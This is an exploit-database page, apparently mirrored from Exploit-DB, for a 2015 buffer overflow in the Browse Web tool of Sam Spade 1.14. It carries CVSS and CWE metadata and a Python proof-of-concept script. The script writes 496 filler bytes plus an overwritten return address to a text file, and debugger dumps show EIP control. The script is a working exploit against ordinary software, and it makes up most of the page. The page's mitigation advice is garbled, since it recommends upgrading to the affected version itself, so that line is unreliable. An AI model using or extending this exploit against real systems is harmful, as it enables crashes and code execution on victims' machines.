header-logo
Suggest Exploit
vendor:
Sam Spade
by:
Nipun Jaswal
7,5
CVSS
HIGH
Denial of Service / Proof Of Concept/ Eip Overwrite
119
CWE
Product Name: Sam Spade
Affected Version From: 1.14
Affected Version To: 1.14
Patch Exists: YES
Related CWE: N/A
CPE: a:sam_spade:sam_spade:1.14
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 Home Basic
2015

Sam Spade 1.14 Browse URL Buffer Overflow PoC

A buffer overflow vulnerability exists in Sam Spade 1.14 when a user enters the contents of 'sam_spade_browse_url.txt' into the 'Browse Web' tool. This can lead to a denial of service or potentially code execution.

Mitigation:

Upgrade to the latest version of Sam Spade 1.14 or later.
Source

Exploit-DB raw data:

#!/usr/bin/env python
# Exploit Title     : Sam Spade 1.14 Browse URL Buffer Overflow PoC
# Discovery by      : Nipun Jaswal
# Email             : mail@nipunjaswal.info
# Discovery Date    : 14/11/2015
# Vendor Homepage   : http://samspade.org
# Software Link     : http://www.majorgeeks.com/files/details/sam_spade.html
# Tested Version    : 1.14
# Vulnerability Type: Denial of Service / Proof Of Concept/ Eip Overwrite
# Tested on OS      : Windows 7 Home Basic
# Crash Point       : Go to Tools > Browse Web> Enter the contents of 'sam_spade_browse_url.txt' > OK , Note: Do #Not Remove the http://
##########################################################################################
#  -----------------------------------NOTES----------------------------------------------#
##########################################################################################
# And the Stack
#0012F73C   41414141  AAAA
#0012F740   41414141  AAAA
#0012F744   DEADBEAF  ¯¾­Þ

# Registers
#EAX 00000001
#ECX 00000001
#EDX 00000030
#EBX 00000000
#ESP 0012F74C
#EBP 41414141
#ESI 008DA260
#EDI 0176F4E0
#EIP DEADBEAF

f = open("sam_spade_browse_url.txt", "w")
Junk = "A"* 496
eip_overwrite = "\xaf\xbe\xad\xde"
f.write(Junk+eip_overwrite)
f.close()

Navigation

Suggest Exploit

Services By CQR